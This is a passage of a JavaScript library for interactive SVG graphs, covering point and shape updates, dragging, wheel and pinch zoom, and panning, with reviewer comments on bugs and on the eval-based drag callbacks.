        rectoptions.y = rectvalueupdate.y || rectoptions.y
    }
    else {
        rectoptions.y = rectvalueupdate.y
    }
    if (rectvalueupdate.w != 0) {
        rectoptions.w = rectvalueupdate.w || rectoptions.w
    }
    else {
        rectoptions.w = rectvalueupdate.w
    }
    if (rectvalueupdate.h != 0) {
        rectoptions.h = rectvalueupdate.h || rectoptions.h
    }
    else {
        rectoptions.h = rectvalueupdate.h
    }
    rectoptions.stroke = rectvalueupdate.stroke || rectoptions.stroke
    rectoptions.strokewidth = rectvalueupdate.strokewidth || rectoptions.strokewidth
    rectoptions.rectcolor = rectvalueupdate.rectcolor || rectoptions.rectcolor
    // Convert graph-space width/height to percent units along each axis.
    rx = viewX.distanceBTWgraphToSvg([0,0],[rectoptions.w, 0], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
    ry = viewX.distanceBTWgraphToSvg([0,0],[0, rectoptions.h], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
    rectElement.setAttribute('x', viewX.graphToScaledX(rectoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
    rectElement.setAttribute('y', viewX.graphToScaledY(rectoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
    rectElement.setAttribute('width', rx + '%')
    rectElement.setAttribute('height', ry + '%');
    rectElement.style.fill = rectoptions.rectcolor
    rectElement.style.strokeWidth = rectoptions.strokewidth + '%';
    rectElement.style.stroke = rectoptions.stroke;
    viewX.graphData[graphname].rectData[rectname] = [rectElement, rectoptions]
}
viewX.addPoint = function(graphname, pointname, pointoptions) {
    // Draw a point marker (SVG <ellipse>) at graph coordinates (x, y) and
    // optionally wire it up for dragging. Defaults: x=0.3, y=0.3 (the != 0
    // checks let callers pass an explicit 0), pointsize=0.7 (percent).
    // Returns [pointElement, pointoptions].
    gdata = viewX.graphData[graphname]
    aratio = gdata.aspectratio
    pointoptions = pointoptions || {}
    if (pointoptions.x != 0) {
        pointoptions.x = pointoptions.x || 0.3
    }
    if (pointoptions.y != 0) {
        pointoptions.y = pointoptions.y || 0.3
    }
    // pointoptions.y = pointoptions.y || 0.3
    pointoptions.pointsize = pointoptions.pointsize || 0.7
    pointoptions.name = pointname || viewX.uid
    pointoptions.pointcolor = pointoptions.pointcolor || 'hsla(190, 100%, 50%, 1)'
    var pointElement = document.createElementNS("http://www.w3.org/2000/svg", 'ellipse');
    pointElement.setAttribute('cx', viewX.graphToScaledX(pointoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
    pointElement.setAttribute('cy', viewX.graphToScaledY(pointoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
    pointElement.setAttribute('rx', pointoptions.pointsize + '%')
    pointElement.setAttribute('ry', pointoptions.pointsize + '%');
    pointElement.setAttribute('id', graphname + '-point-' + pointname)
    viewX.uid = viewX.uid + 1
    pointElement.setAttribute('vector-effect','non-scaling-stroke');
    pointElement.style.fill = pointoptions.pointcolor
    gdata.svgElement.appendChild(pointElement);
    // Drag wiring: draggability enables the handlers at all; once enabled,
    // currentlyDraggable can be toggled later without re-binding listeners.
    pointoptions.draggability = pointoptions.draggability || 'no'
    if (pointoptions.draggability == 'yes') {
        pointoptions.currentlyDraggable = pointoptions.currentlyDraggable || 'yes'
    }
    else {
        pointoptions.currentlyDraggable = pointoptions.currentlyDraggable || 'no'
    }
    pointoptions.runFunctionOnDragEnd = pointoptions.runFunctionOnDragEnd || ''
    pointoptions.runFunctionDuringDrag = pointoptions.runFunctionDuringDrag || ''
    if (pointoptions.draggability == 'yes') {
        pointElement.addEventListener('mousedown', viewX.pointDrag)
        pointElement.addEventListener('touchstart', viewX.pointDrag)
        // Stop the page from scrolling while the user drags on touch devices.
        gdata.svgElement.addEventListener('touchmove', viewX.graphTouchDisable)
    }
    else {
        // Non-draggable points ignore pointer events entirely.
        pointElement.style.pointerEvents = 'none'
    }
    pointoptions.dragDirection = pointoptions.dragDirection || 'bothXY'
    pointoptions.dragIfCondition = pointoptions.dragIfCondition || 'true'
    viewX.graphData[graphname].pointData[pointname] = [pointElement, pointoptions]
    // Reverse map lets event handlers resolve (graphname, pointname) from
    // the DOM element id.
    viewX.reverseGraphElementMap[pointElement.id] = [graphname, pointname]
    return [pointElement, pointoptions]
}
viewX.updatePoint = function(graphname, pointname, newpointoptions) {
    // Update an existing point's position, size, color and drag behavior.
    // Omitted position/size/color fields keep their previous values; the
    // drag-related flags reset to their defaults when omitted (preserved
    // from the original implementation).
    gdata = viewX.graphData[graphname]
    pointoptions = gdata.pointData[pointname][1]
    pointElement = gdata.pointData[pointname][0]
    aratio = gdata.aspectratio
    if (pointoptions.x != 0) {
        pointoptions.x = newpointoptions.x || pointoptions.x
    }
    if (pointoptions.y != 0) {
        // Bug fix: this previously read newpointoptions.x, so updating a
        // point's position set y to the new x value.
        pointoptions.y = newpointoptions.y || pointoptions.y
    }
    // pointoptions.y = pointoptions.y || 0.3
    pointoptions.pointsize = newpointoptions.pointsize || pointoptions.pointsize
    pointoptions.pointcolor = newpointoptions.pointcolor || pointoptions.pointcolor
    pointElement.setAttribute('cx', viewX.graphToScaledX(pointoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
    pointElement.setAttribute('cy', viewX.graphToScaledY(pointoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
    pointElement.setAttribute('rx', pointoptions.pointsize + '%')
    pointElement.setAttribute('ry', pointoptions.pointsize + '%');
    pointElement.setAttribute('vector-effect','non-scaling-stroke');
    pointElement.style.fill = pointoptions.pointcolor
    pointoptions.draggability = newpointoptions.draggability || 'no'
    if (pointoptions.draggability == 'yes') {
        pointoptions.currentlyDraggable = newpointoptions.currentlyDraggable || 'yes'
    }
    else {
        pointoptions.currentlyDraggable = newpointoptions.currentlyDraggable || 'no'
    }
    pointoptions.runFunctionOnDragEnd = newpointoptions.runFunctionOnDragEnd || ''
    pointoptions.runFunctionDuringDrag = newpointoptions.runFunctionDuringDrag || ''
    pointoptions.dragDirection = newpointoptions.dragDirection || 'bothXY'
    pointoptions.dragIfCondition = newpointoptions.dragIfCondition || ''
    // (Re-)bind or unbind the drag handlers; addEventListener with the same
    // function reference is a no-op if already bound.
    if (pointoptions.draggability == 'yes') {
        pointElement.addEventListener('mousedown', viewX.pointDrag)
        pointElement.addEventListener('touchstart', viewX.pointDrag)
    }
    else {
        pointElement.removeEventListener('mousedown', viewX.pointDrag)
        pointElement.removeEventListener('touchstart', viewX.pointDrag)
    }
    viewX.graphData[graphname].pointData[pointname] = [pointElement, pointoptions]
}
viewX.updatePointXY = function(graphname, pointname, xvalue, yvalue) {
    // Fast path for moving a point: set its graph-space (x, y) directly and
    // reposition the SVG ellipse, leaving all other options untouched.
    pointElement = document.getElementById(graphname + '-point-' + pointname)
    gdata = viewX.graphData[graphname]
    aratio = gdata.aspectratio
    pointoptions = viewX.graphData[graphname].pointData[pointname][1]
    pointoptions.x = xvalue
    pointoptions.y = yvalue
    pointElement.setAttribute('cx', viewX.graphToScaledX(pointoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
    pointElement.setAttribute('cy', viewX.graphToScaledY(pointoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
    viewX.graphData[graphname].pointData[pointname] = [pointElement, pointoptions]
}
viewX.removePoint = function(graphname, pointname) {
    // Delete the named point's SVG element (via outerHTML = "") and drop
    // its registry entry.
    pointElement = document.getElementById(graphname + '-point-' + pointname)
    pointElement.outerHTML = "";
    delete viewX.graphData[graphname].pointData[pointname]
}
viewX.removeLine = function(graphname, linename) {
    // Delete the named line's SVG element and drop its registry entry.
    lineElement = document.getElementById(graphname + '-line-' + linename)
    lineElement.outerHTML = "";
    delete viewX.graphData[graphname].lineData[linename]
}
viewX.removeCircle = function(graphname, circlename) {
    // Delete the named circle's SVG element and drop its registry entry.
    circleElement = document.getElementById(graphname + '-circle-' + circlename)
    circleElement.outerHTML = "";
    delete viewX.graphData[graphname].circleData[circlename]
}
viewX.removeText = function(graphname, textname) {
    // Delete the named text's SVG element and drop its registry entry.
    textElement = document.getElementById(graphname + '-text-' + textname)
    textElement.outerHTML = "";
    delete viewX.graphData[graphname].textData[textname]
}
viewX.removePath = function(graphname, pathname) {
    // Delete the named path's SVG element and drop its registry entry.
    pathElement = document.getElementById(graphname + '-path-' + pathname)
    pathElement.outerHTML = "";
    delete viewX.graphData[graphname].pathData[pathname]
}
viewX.removeArrow = function(graphname, arrowname) {
    // Delete the named arrow's SVG element and drop its registry entry.
    arrowElement = document.getElementById(graphname + '-arrow-' + arrowname)
    arrowElement.outerHTML = "";
    delete viewX.graphData[graphname].arrowData[arrowname]
}
viewX.removeGraph = function(graphname) {
    // Delete an entire graph's root element and all of its stored data.
    graphElement = document.getElementById(graphname)
    graphElement.outerHTML = "";
    delete viewX.graphData[graphname]
}
viewX.basicSlider = function(graphname2, slidernamebasic, maxv, minv, currentv, thickness, coordinates) {
    // Convenience wrapper around viewX.addSlider (defined earlier in this
    // file): builds the options object from positional arguments and turns
    // on automatic knob sizing. 'coordinates' is [[x1, y1], [x2, y2]] in
    // graph space. NOTE: 'options' is an implicit global, as elsewhere here.
    options = {}
    options.maxvalue = maxv
    options.minvalue = minv
    options.currentvalue = currentv
    options.x1 = coordinates[0][0]
    options.y1 = coordinates[0][1]
    options.x2 = coordinates[1][0]
    options.y2 = coordinates[1][1]
    options.strokewidth = thickness
    options.automaticallySetKnobRadius = 'yes'
    viewX.addSlider(graphname2, slidernamebasic, options)
}
viewX.makeArc = function(arcradius, arcthickness, arccolor, startanglepercent, endanglepercent, ringname) {
    // Build a circular arc as a dense point list and draw it as a path on
    // the 'ringvisualgraph' graph. start/endanglepercent are fractions of a
    // full turn (0..1). Returns the generated point list.
    resolution = 100
    arcpoints = []
    // NOTE(review): the upper bound endanglepercent*(resolution + 1)
    // overshoots endanglepercent*resolution by one step — presumably to
    // close the arc visually; confirm before changing.
    for (p = startanglepercent*resolution; p < endanglepercent*(resolution + 1); p++) {
        quanta = 2*Math.PI/resolution
        arcpoints.push([arcradius*Math.cos(quanta*p), arcradius*Math.sin(quanta*p)])
    }
    options = {}
    options.points = arcpoints
    options.pathcolor = arccolor
    options.strokewidth = arcthickness
    viewX.addPath('ringvisualgraph', ringname, options)
    // console.log(options.points)
    return arcpoints
}
viewX.makeArcS = function(ringarcnum, arcradius, arcthickness, arccolor, startanglepercent, endanglepercent, ringname) {
resolution = 20
arcpoints = []
for (p = startanglepercent*resolution; p < endanglepercent*(resolution + 1); p++) {
quanta = 2*Math.PI/resolution
arcpoints.push([arcradius*Math.cos(quanta*p), arcradius*Math.sin(quanta*p)])
}
options = {}
options.points = arcpoints
options.pathcolor = arccolor
options.strokewidth = arcthickness
viewX.addPath('ringvisualgraph', ringname, options)
// console.log(options.points)
}
// Remove every element in a (possibly undefined) element collection from the DOM.
viewX.deleteSegments = function(collection) {
    if (typeof collection != 'undefined') {
        // 'let' keeps the index local instead of leaking an implicit global.
        for (let f = 0; f < collection.length; f++) {
            collection[f].outerHTML = ''
        }
    }
}
// Uniformly random element of an array. Math.floor is the idiomatic way to
// truncate a non-negative number (the original used parseInt on a number,
// which stringifies first).
viewX.randomChoice = function(choicearray) {
    return choicearray[Math.floor(Math.random()*choicearray.length)]
}
// Weighted random selection: element i is chosen with probability
// weightArray[i] / sum(weightArray). Silently returns undefined when the two
// arrays have different lengths (same behavior as before).
viewX.randomWeightedChoice = function(choicearray, weightArray) {
    if (choicearray.length == weightArray.length) {
        // Locals instead of implicit globals.
        const weightSumA = weightArray.reduce(function(a, b) { return a + b; }, 0);
        const weightvalueChosen = Math.random()*weightSumA
        let weightSumZ = 0
        let indexchosenW
        for (let weightIndex = 0; weightIndex < weightArray.length; weightIndex++) {
            weightSumZ = weightSumZ + weightArray[weightIndex]
            if (weightSumZ >= weightvalueChosen) {
                indexchosenW = weightIndex
                break
            }
        }
        return choicearray[indexchosenW]
    }
}
// Linear interpolation/extrapolation: maps inputvl from [xv1, xv2] onto [yv1, yv2].
viewX.linearValue = function(xv1, xv2, yv1, yv2, inputvl) {
    return yv1 + ((inputvl - xv1)/(xv2 - xv1))*(yv2 - yv1)
}
// Element currently being dragged; set on mousedown/touchstart and read by
// the shared move/up handlers below.
viewX.currentMovingPoint = ''
// mousedown/touchstart handler for draggable points: swaps the per-element
// start listeners for window-level move/up listeners for the drag duration.
// NOTE(review): gphname/ptname are implicit globals shared across the drag
// handlers — confirm this is intentional.
viewX.pointDrag = function(event) {
    gphname = viewX.reverseGraphElementMap[event.target.id][0]
    ptname = viewX.reverseGraphElementMap[event.target.id][1]
    if (viewX.graphData[gphname].pointData[ptname][1].currentlyDraggable == 'yes') {
        // Suspend whole-graph panning while a point drag is in progress.
        if (viewX.graphData[gphname].currentlyDraggableGraph == 'yes') {
            document.getElementById(gphname).removeEventListener('mousedown', viewX.graphDragHandle)
            document.getElementById(gphname).removeEventListener('touchstart', viewX.graphDragHandle)
        }
        event.target.removeEventListener('mousedown', viewX.pointDrag)
        event.target.removeEventListener('touchstart', viewX.pointDrag)
        window.addEventListener('mousemove', viewX.pointMoveEvent)
        window.addEventListener('mouseup', viewX.pointUpEvent)
        event.preventDefault()
        // passive: false so the touchmove handler may call preventDefault().
        window.addEventListener('touchmove', viewX.pointMoveEvent, { passive: false })
        window.addEventListener('touchend', viewX.pointUpEvent)
        // window.addEventListener('mouseout', viewX.pointUpEvent)
        viewX.currentMovingPoint = event.target
    }
}
// Reusable SVGPoint per graph, used for screen -> SVG coordinate conversion.
viewX.svgPTVariable = {}
// mousemove/touchmove handler while a point drag is active: converts the
// cursor position to graph coordinates and moves the point, subject to its
// configured drag constraints.
viewX.pointMoveEvent = function(event) {
    event.preventDefault()
    gphname = viewX.reverseGraphElementMap[viewX.currentMovingPoint.id][0]
    ptname = viewX.reverseGraphElementMap[viewX.currentMovingPoint.id][1]
    var rect = document.getElementById(gphname).getBoundingClientRect();
    posx = event.clientX - rect.left;
    posy = event.clientY - rect.top;
    viewX.svgPTVariable[gphname].x = event.clientX;
    viewX.svgPTVariable[gphname].y = event.clientY;
    // Touch events carry coordinates on changedTouches instead of clientX/Y.
    if (event.clientX == undefined) {
        posx = event.changedTouches[0].clientX - rect.left;
        posy = event.changedTouches[0].clientY - rect.top;
        viewX.svgPTVariable[gphname].x = event.changedTouches[0].clientX;
        viewX.svgPTVariable[gphname].y = event.changedTouches[0].clientY;
    }
    // Screen -> SVG -> graph coordinate conversion.
    var cursorpt = viewX.svgPTVariable[gphname].matrixTransform(document.getElementById(gphname).getScreenCTM().inverse());
    moveX = viewX.svgToGraphX(cursorpt.x, viewX.graphData[gphname].xmin,viewX.graphData[gphname].xmax, viewX.graphData[gphname].aspectratio)
    moveY = viewX.svgToGraphY(cursorpt.y, viewX.graphData[gphname].ymin,viewX.graphData[gphname].ymax, viewX.graphData[gphname].aspectratio)
    // NOTE(review): `typeof eval(...) != undefined` compares a string against
    // undefined and is therefore always true — likely meant != 'undefined'.
    // Also: dragIfCondition / runFunctionDuringDrag are eval()'d strings; only
    // trusted values should ever be stored in pointData.
    if (typeof eval(viewX.graphData[gphname].pointData[ptname][1].dragIfCondition) != undefined) {
        if (eval(viewX.graphData[gphname].pointData[ptname][1].dragIfCondition) == true) {
            // Constrain movement to the configured axis/axes.
            if (viewX.graphData[gphname].pointData[ptname][1].dragDirection == 'bothXY') {
                viewX.updatePointXY(gphname, ptname, moveX, moveY)
                eval(viewX.graphData[gphname].pointData[ptname][1].runFunctionDuringDrag)
            }
            else if (viewX.graphData[gphname].pointData[ptname][1].dragDirection == 'onlyY') {
                viewX.updatePointXY(gphname, ptname, viewX.graphData[gphname].pointData[ptname][1].x, moveY)
                eval(viewX.graphData[gphname].pointData[ptname][1].runFunctionDuringDrag)
            }
            else if (viewX.graphData[gphname].pointData[ptname][1].dragDirection == 'onlyX') {
                viewX.updatePointXY(gphname, ptname, moveX, viewX.graphData[gphname].pointData[ptname][1].y)
                eval(viewX.graphData[gphname].pointData[ptname][1].runFunctionDuringDrag)
            }
        }
    }
}
// mouseup/touchend handler: restores the per-element start listeners, removes
// the window-level drag listeners, and fires the point's drag-end callback.
viewX.pointUpEvent = function(event) {
    gphname = viewX.reverseGraphElementMap[viewX.currentMovingPoint.id][0]
    ptname = viewX.reverseGraphElementMap[viewX.currentMovingPoint.id][1]
    // Re-enable whole-graph panning if this graph supports it.
    if (viewX.graphData[gphname].currentlyDraggableGraph == 'yes') {
        document.getElementById(gphname).addEventListener('mousedown', viewX.graphDragHandle)
        document.getElementById(gphname).addEventListener('touchstart', viewX.graphDragHandle)
    }
    viewX.currentMovingPoint.addEventListener('mousedown', viewX.pointDrag)
    viewX.currentMovingPoint.addEventListener('touchstart', viewX.pointDrag)
    window.removeEventListener('mousemove', viewX.pointMoveEvent)
    window.removeEventListener('mouseup', viewX.pointUpEvent)
    window.removeEventListener('touchmove', viewX.pointMoveEvent)
    window.removeEventListener('touchend', viewX.pointUpEvent)
    // window.removeEventListener('mouseout', viewX.pointUpEvent)
    // runFunctionOnDragEnd is an eval()'d string configured per point.
    eval(viewX.graphData[gphname].pointData[ptname][1].runFunctionOnDragEnd)
}
// Mouse-wheel zoom handler: rescales the graph under the cursor about the
// cursor position. Only the wheel direction is used, not its magnitude.
// The two zoom branches of the original were verbatim duplicates differing
// only in the scale factor; they are collapsed into one application below.
viewX.wheelHandle = function(event) {
    event.preventDefault();
    // Normalize the wheel delta to +/-1. Firefox exposes deltaY instead of
    // wheelDeltaY (the two properties have opposite signs).
    let whlvalue = (event.wheelDeltaY)/Math.abs(event.wheelDeltaY)
    if (event.wheelDeltaY == undefined) {
        whlvalue = (event.deltaY)/Math.abs(event.deltaY)
        // For FireFox
    }
    const scalefactorup = 1.1
    const scalefactordown = 0.9
    const gdata = viewX.graphData[event.target.id.split('-')[0]]
    if (gdata == undefined) {
        return
    }
    // Exponent of each axis span, used as a guard against zooming past the
    // limits of floating-point precision.
    let scale = gdata.ymax - gdata.ymin
    let expstring = scale.toExponential().toString()
    const ordery = (expstring.slice(expstring.indexOf('e') + 1)*(-1))
    scale = gdata.xmax - gdata.xmin
    expstring = scale.toExponential().toString()
    const orderx = (expstring.slice(expstring.indexOf('e') + 1)*(-1))
    const gphname = gdata.name
    // Cursor position, with the touch-event fallback when clientX is absent.
    const rect = document.getElementById(gphname).getBoundingClientRect();
    let posx = event.clientX - rect.left;
    let posy = event.clientY - rect.top;
    viewX.svgPTVariable[gphname].x = event.clientX;
    viewX.svgPTVariable[gphname].y = event.clientY;
    if (event.clientX == undefined) {
        posx = event.changedTouches[0].clientX - rect.left;
        posy = event.changedTouches[0].clientY - rect.top;
        viewX.svgPTVariable[gphname].x = event.changedTouches[0].clientX;
        viewX.svgPTVariable[gphname].y = event.changedTouches[0].clientY;
    }
    // Screen -> SVG -> graph coordinates of the zoom anchor.
    const cursorpt = viewX.svgPTVariable[gphname].matrixTransform(document.getElementById(gphname).getScreenCTM().inverse());
    const zoomlocationX = viewX.svgToGraphX(cursorpt.x, gdata.xmin, gdata.xmax, gdata.aspectratio)
    const zoomlocationY = viewX.svgToGraphY(cursorpt.y, gdata.ymin, gdata.ymax, gdata.aspectratio)
    posx = posx/rect.width
    posy = posy/rect.height
    // Ignore wheel events in the outer 11% band of the graph.
    if (posx > 0.11 && posx < 0.89 && posy > 0.11 && posy < 0.89) {
        let scaleupdownFactor = null
        if (whlvalue < 0) {
            scaleupdownFactor = scalefactorup
        }
        else if (whlvalue >= 0 && orderx < 14 && ordery < 14) {
            // The order guard refuses further zooming once either axis span's
            // exponent becomes extreme.
            scaleupdownFactor = scalefactordown
        }
        if (scaleupdownFactor != null) {
            // Rescale each half-span about the anchor so the point under the
            // cursor stays fixed.
            viewX.updateGraphZoom(gphname, {
                xmin: zoomlocationX - (zoomlocationX - gdata.xmin)*scaleupdownFactor,
                xmax: zoomlocationX + (gdata.xmax - zoomlocationX)*scaleupdownFactor,
                ymin: zoomlocationY - (zoomlocationY - gdata.ymin)*scaleupdownFactor,
                ymax: zoomlocationY + (gdata.ymax - zoomlocationY)*scaleupdownFactor
            })
        }
    }
}
// Graph-pan state: the <svg> element being dragged and the graph-space
// location where the drag started.
viewX.currentMovingGraph = ''
viewX.currentMovingGraphStartLocation = []
// mousedown/touchstart handler for panning a whole graph.
viewX.graphDragHandle = function(event) {
    event.preventDefault();
    gphname = event.target.id.split('-')[0]
    if (viewX.graphData[gphname].currentlyDraggableGraph == 'yes') {
        // Swap the per-graph start listeners for window-level move/up listeners.
        viewX.graphData[gphname].svgElement.removeEventListener('mousedown', viewX.graphDragHandle)
        viewX.graphData[gphname].svgElement.removeEventListener('touchstart', viewX.graphDragHandle)
        window.addEventListener('mousemove', viewX.graphDragMoveEvent)
        window.addEventListener('mouseup', viewX.graphDragUpEvent)
        event.preventDefault()
        // passive: false so the touchmove handler may call preventDefault().
        window.addEventListener('touchmove', viewX.graphDragMoveEvent, { passive: false })
        window.addEventListener('touchend', viewX.graphDragUpEvent)
        // window.addEventListener('mouseout', viewX.pointUpEvent)
        viewX.currentMovingGraph = viewX.graphData[gphname].svgElement
        // Record where (in graph coordinates) the drag began; touch fallback
        // when clientX is absent.
        var rect = document.getElementById(gphname).getBoundingClientRect();
        posx = event.clientX - rect.left;
        posy = event.clientY - rect.top;
        viewX.svgPTVariable[gphname].x = event.clientX;
        viewX.svgPTVariable[gphname].y = event.clientY;
        if (event.clientX == undefined) {
            posx = event.changedTouches[0].clientX - rect.left;
            posy = event.changedTouches[0].clientY - rect.top;
            viewX.svgPTVariable[gphname].x = event.changedTouches[0].clientX;
            viewX.svgPTVariable[gphname].y = event.changedTouches[0].clientY;
        }
        var cursorpt = viewX.svgPTVariable[gphname].matrixTransform(document.getElementById(gphname).getScreenCTM().inverse());
        tapX = viewX.svgToGraphX(cursorpt.x, viewX.graphData[gphname].xmin,viewX.graphData[gphname].xmax, viewX.graphData[gphname].aspectratio)
        tapY = viewX.svgToGraphY(cursorpt.y, viewX.graphData[gphname].ymin,viewX.graphData[gphname].ymax, viewX.graphData[gphname].aspectratio)
        viewX.currentMovingGraphStartLocation = [tapX, tapY]
        // NOTE(review): currentMovingGraphOriginalBounds is an implicit global
        // and is never read elsewhere in this chunk — confirm it is needed.
        currentMovingGraphOriginalBounds = [viewX.graphData[gphname].xmin, viewX.graphData[gphname].xmax, viewX.graphData[gphname].ymin, viewX.graphData[gphname].ymax]
        viewX.currentMovingGraph.style.cursor = 'move'
    }
}
// Convert client (viewport pixel) coordinates to graph coordinates for the
// named graph. Bug fixes vs. the original: it read the stale global `gphname`
// (left over from previous events) instead of its own `graphNameInput`
// parameter, and called svgToGraphX without the `viewX.` prefix, which would
// throw a ReferenceError.
viewX.clientToGraph = function(clientValues, graphNameInput) {
    const gdata = viewX.graphData[graphNameInput]
    viewX.svgPTVariable[graphNameInput].x = clientValues[0];
    viewX.svgPTVariable[graphNameInput].y = clientValues[1];
    const cursorpt = viewX.svgPTVariable[graphNameInput].matrixTransform(document.getElementById(graphNameInput).getScreenCTM().inverse());
    return [viewX.svgToGraphX(cursorpt.x, gdata.xmin, gdata.xmax, gdata.aspectratio), viewX.svgToGraphY(cursorpt.y, gdata.ymin, gdata.ymax, gdata.aspectratio)]
}
// touchmove handler during a two-finger pinch: rescales the graph about the
// midpoint of the starting touch pair.
viewX.graphPinchMoveEvent = function(event) {
    if (event.changedTouches.length == 2) {
        gphname = event.target.id.split('-')[0]
        touch1 = [event.changedTouches[0].clientX, event.changedTouches[0].clientY]
        touch2 = [event.changedTouches[1].clientX, event.changedTouches[1].clientY]
        touch1 = viewX.clientToGraph(touch1, gphname)
        touch2 = viewX.clientToGraph(touch2, gphname)
        oldtouch1 = viewX.clientToGraph(viewX.pinchStartData[0], gphname)
        oldtouch2 = viewX.clientToGraph(viewX.pinchStartData[1], gphname)
        // Ratio of starting finger separation to current separation:
        // > 1 when fingers move together, < 1 when they spread apart.
        pinchScale = viewX.distF(oldtouch1, oldtouch2)/viewX.distF(touch1, touch2)
        pinchStartMidpoint = [(oldtouch1[0] + oldtouch2[0])/2, (oldtouch1[1] + oldtouch2[1])/2]
        zoomlocationX = pinchStartMidpoint[0]
        zoomlocationY = pinchStartMidpoint[1]
        gdata = viewX.graphData[gphname]
        // Axis-span exponents, computed here but unused (cf. wheelHandle's guard).
        scale = gdata.ymax - gdata.ymin
        expstring = scale.toExponential().toString()
        ordery = (expstring.slice(expstring.indexOf('e') + 1)*(-1))
        scale = gdata.xmax - gdata.xmin
        expstring = scale.toExponential().toString()
        orderx = (expstring.slice(expstring.indexOf('e') + 1)*(-1))
        currentvalues = viewX.graphData[gphname]
        // Map the pinch ratio onto a damped zoom factor around 1.
        scaleFactorForTouch = 1
        if (pinchScale <= 1) {
            scaleFactorForTouch = viewX.linearValue(0, 1, 0.9, 1, pinchScale)
        }
        else {
            scaleFactorForTouch = viewX.linearValue(1, 5, 1, 1.1, pinchScale)
        }
        // Rescale each half-span about the pinch midpoint.
        leftX = (zoomlocationX - currentvalues.xmin)*scaleFactorForTouch
        newZXmin = zoomlocationX - leftX
        rightX = (currentvalues.xmax - zoomlocationX)*scaleFactorForTouch
        newZXmax = zoomlocationX + rightX
        leftY = (zoomlocationY - currentvalues.ymin)*scaleFactorForTouch
        newZYmin = zoomlocationY - leftY
        rightY = (currentvalues.ymax - zoomlocationY)*scaleFactorForTouch
        newZYmax = zoomlocationY + rightY
        options = {}
        options.xmin = newZXmin
        options.xmax = newZXmax
        options.ymin = newZYmin
        options.ymax = newZYmax
        viewX.updateGraphZoom(gphname, options)
        // console.log(pinchStartMidpoint)
    }
}
// touchend handler: leaves pinch mode and detaches the pinch listeners.
viewX.graphPinchEndEvent = function(event) {
    viewX.pinchZoom = false
    window.removeEventListener('touchmove', viewX.graphPinchMoveEvent)
    window.removeEventListener('touchend', viewX.graphPinchEndEvent)
}
// True while a two-finger pinch is in progress; pinchStartData holds the two
// initial touch positions in client coordinates.
viewX.pinchZoom = false
viewX.pinchStartData = []
// mousemove/touchmove handler while panning a graph: translates the view by
// the cursor's displacement from the drag start, or hands off to pinch-zoom
// when a second finger lands.
viewX.graphDragMoveEvent = function(event) {
    event.preventDefault()
    gphname = viewX.currentMovingGraph.id
    var rect = document.getElementById(gphname).getBoundingClientRect();
    posx = event.clientX - rect.left;
    posy = event.clientY - rect.top;
    viewX.svgPTVariable[gphname].x = event.clientX;
    viewX.svgPTVariable[gphname].y = event.clientY;
    touchEventDetect = 0
    if (event.clientX == undefined) {
        posx = event.changedTouches[0].clientX - rect.left;
        posy = event.changedTouches[0].clientY - rect.top;
        viewX.svgPTVariable[gphname].x = event.changedTouches[0].clientX;
        viewX.svgPTVariable[gphname].y = event.changedTouches[0].clientY;
        // Second finger detected: abort the pan and switch to pinch-zoom mode.
        if (event.changedTouches.length == 2) {
            oldtouch1 = [event.changedTouches[0].clientX, event.changedTouches[0].clientY]
            oldtouch2 = [event.changedTouches[1].clientX, event.changedTouches[1].clientY]
            viewX.pinchStartData = [oldtouch1, oldtouch2]
            dummyEve = {}
            viewX.pinchZoom = true
            viewX.graphDragUpEvent(dummyEve)
            window.addEventListener('touchmove', viewX.graphPinchMoveEvent)
            window.addEventListener('touchend', viewX.graphPinchEndEvent)
        }
        touchEventDetect = event.changedTouches[0].identifier
    }
    // Only pan for the mouse or the first touch, and never while pinching.
    if (viewX.pinchZoom == false && touchEventDetect == 0) {
        var cursorpt = viewX.svgPTVariable[gphname].matrixTransform(document.getElementById(gphname).getScreenCTM().inverse());
        moveX = viewX.svgToGraphX(cursorpt.x, viewX.graphData[gphname].xmin,viewX.graphData[gphname].xmax, viewX.graphData[gphname].aspectratio)
        moveY = viewX.svgToGraphY(cursorpt.y, viewX.graphData[gphname].ymin,viewX.graphData[gphname].ymax, viewX.graphData[gphname].aspectratio)
        // Shift the axis bounds opposite to the cursor motion so the content
        // follows the cursor.
        deltaVecX = moveX - viewX.currentMovingGraphStartLocation[0]
        deltaVecY = moveY - viewX.currentMovingGraphStartLocation[1]
        currentvalues = viewX.graphData[gphname]
        newZXmin = currentvalues.xmin - deltaVecX
        newZXmax =currentvalues.xmax - deltaVecX
        newZYmin = currentvalues.ymin - deltaVecY
        newZYmax = currentvalues.ymax - deltaVecY
        // NOTE(review): `typeof eval(...) != undefined` compares a string with
        // undefined and is therefore always true — likely meant != 'undefined'.
        if (typeof eval(viewX.graphData[gphname].dragIfCondition) != undefined) {
            if (eval(viewX.graphData[gphname].dragIfCondition) == true) {
                // Apply the pan on the configured axis/axes only.
                if (viewX.graphData[gphname].dragDirection == 'bothXY') {
                    options = {}
                    options.xmin = newZXmin
                    options.xmax = newZXmax
                    options.ymin = newZYmin
                    options.ymax = newZYmax
                    viewX.updateGraphZoom(gphname, options)
                    eval(viewX.graphData[gphname].runFunctionDuringDrag)
                }
                else if (viewX.graphData[gphname].dragDirection == 'onlyY') {
                    options = {}
                    options.ymin = newZYmin
                    options.ymax = newZYmax
                    viewX.updateGraphZoom(gphname, options)
                    eval(viewX.graphData[gphname].runFunctionDuringDrag)
                }
                else if (viewX.graphData[gphname].dragDirection == 'onlyX') {
                    options = {}
                    options.xmin = newZXmin
                    options.xmax = newZXmax
                    viewX.updateGraphZoom(gphname, options)
                    eval(viewX.graphData[gphname].runFunctionDuringDrag)
                }
            }
        }
    }
}
// mouseup/touchend handler: reattaches the graph's start listeners, removes
// the window-level pan listeners, and fires the graph's drag-end callback.
viewX.graphDragUpEvent = function(event) {
    gphname = viewX.currentMovingGraph.id
    viewX.currentMovingGraph.addEventListener('mousedown', viewX.graphDragHandle)
    viewX.currentMovingGraph.addEventListener('touchstart', viewX.graphDragHandle)
    window.removeEventListener('mousemove', viewX.graphDragMoveEvent)
